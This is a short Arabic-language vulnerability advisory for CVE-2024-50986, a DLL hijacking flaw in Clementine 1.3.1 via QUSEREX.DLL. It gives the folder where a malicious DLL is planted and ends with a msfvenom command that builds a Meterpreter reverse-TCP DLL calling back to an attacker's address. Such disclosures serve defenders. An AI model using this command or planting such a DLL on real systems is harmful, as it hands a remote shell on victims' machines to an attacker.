
ثغرة في Clementine v.1.3.1 تسمح لمهاجم محلي بتنفيذ كود عشوائي عبر ملف DLL مُصمَّم خصيصًا (اختطاف DLL)
الوصف: يحتوي Clementine الإصدار 1.3.1 على ثغرة تسمح لمهاجم محلي بتنفيذ تعليمات برمجية عشوائية عبر ملف DLL مصمم بعناية.
الإصدار المتأثر: Clementine v.1.3.1
الباحث: Utkarsh (r1971d3) LinkedIn
رابط NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
نوع الثغرة: مسار بحث غير موثوق (Untrusted Search Path)
المكوّن المتأثر: QUSEREX.DLL
لاستغلال هذه الثغرة، يجب على المهاجم إنشاء ملف DLL خبيث باسم QUSEREX.DLL ووضعه في المجلد: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. عند تشغيل تطبيق Clementine، سيتم تحميل ملف DLL الخبيث وتنفيذ كود المهاجم.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



